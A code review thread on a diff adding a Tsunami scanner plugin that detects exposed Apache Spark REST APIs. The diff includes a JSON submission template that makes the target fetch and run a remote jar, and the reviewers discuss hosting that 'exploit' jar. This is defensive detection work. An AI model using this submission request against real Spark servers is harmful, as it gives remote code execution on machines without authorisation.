community/detectors/rce/apache_spark_exposed_api/src/main/java/com/google/tsunami/plugins/detectors/rce/apachesparksexposedapi/ApacheSparksExposedApiVulnDetector.java

```diff
@@ -0,0 +1,157 @@
+import static com.google.tsunami.common.net.http.HttpRequest.post;
+
+import com.google.common.collect.ImmutableList;
+import com.google.common.flogger.GoogleLogger;
+import com.google.protobuf.ByteString;
+import com.google.protobuf.util.Timestamps;
+import com.google.tsunami.common.data.NetworkServiceUtils;
+import com.google.tsunami.common.net.http.HttpClient;
+import com.google.tsunami.common.net.http.HttpHeaders;
+import com.google.tsunami.common.net.http.HttpResponse;
+import com.google.tsunami.common.time.UtcClock;
+import com.google.tsunami.plugin.PluginType;
+import com.google.tsunami.plugin.VulnDetector;
+import com.google.tsunami.plugin.annotations.PluginInfo;
+import com.google.tsunami.plugin.payload.Payload;
+import com.google.tsunami.plugin.payload.PayloadGenerator;
+import com.google.tsunami.proto.DetectionReport;
+import com.google.tsunami.proto.DetectionReportList;
+import com.google.tsunami.proto.DetectionStatus;
+import com.google.tsunami.proto.NetworkService;
+import com.google.tsunami.proto.PayloadGeneratorConfig;
+import com.google.tsunami.proto.Severity;
+import com.google.tsunami.proto.TargetInfo;
+import com.google.tsunami.proto.Vulnerability;
+import com.google.tsunami.proto.VulnerabilityId;
+import java.io.IOException;
+import java.time.Clock;
+import java.time.Instant;
+import java.util.regex.Pattern;
+import javax.inject.Inject;
+
+/** A Tsunami plugin for detecting Exposed Apache Spark API. */
+@PluginInfo(
+    type = PluginType.VULN_DETECTION,
+    name = "ApacheSparksExposedApiVulnDetector",
+    version = "0.1",
+    description =
+        "This plugin detects an exposed Apache Spark API which can lead to remote code execution"
+            + " (RCE)",
+    author = "Timo Mueller (work@mtimo.de)",
+    bootstrapModule = ApacheSparksExposedApiVulnDetectorBootstrapModule.class)
+public final class ApacheSparksExposedApiVulnDetector implements VulnDetector {
+
+  private final Clock utcClock;
+  private final HttpClient httpClient;
+  private final PayloadGenerator payloadGenerator;
+  private static final GoogleLogger logger = GoogleLogger.forEnclosingClass();
+  public static final String VULNERABLE_PATH = "v1/submissions/create";
+  private static final Pattern VULNERABILITY_RESPONSE_PATTERN =
+      Pattern.compile("Driver successfully submitted");
+  private static String httpPayloadBodyFormatString =
+      "{\"action\":\"CreateSubmissionRequest\",\"clientSparkVersion\":\"1\",\"appArgs\":[\"%s\"],"
+          + "\"appResource\":\"%s\",\"environmentVariables\":{\"SPARK_ENV_LOADED\":\"1\"},\"mainClass\":\"Tsunami\","
+          + "\"sparkProperties\":{\"spark.jars\":\"%s\",\"spark.driver.supervise\":\"false\",\"spark.app.name\":\"Tsunami\""
+          + ",\"spark.eventLog.enabled\":\"true\",\"spark.submit.deployMode\":\"cluster\",\"spark.master\":\"spark://localhost:6066\"}}";
+  // TODO change the following payload URI to the official Tsunami one
```

Comment:
This is in here for testing purposes. We might want to merge the payload first and then this PR to ensure everything is working correctly.

Reply:
This can be changed as soon as #461 is merged

Reply:
It's now available at  https://github.com/google/tsunami-security-scanner-plugins/raw/master/payloads/apache_spark_exposed_api/Tsunami_Apache_Spark_Exploit.jar

Reply:
done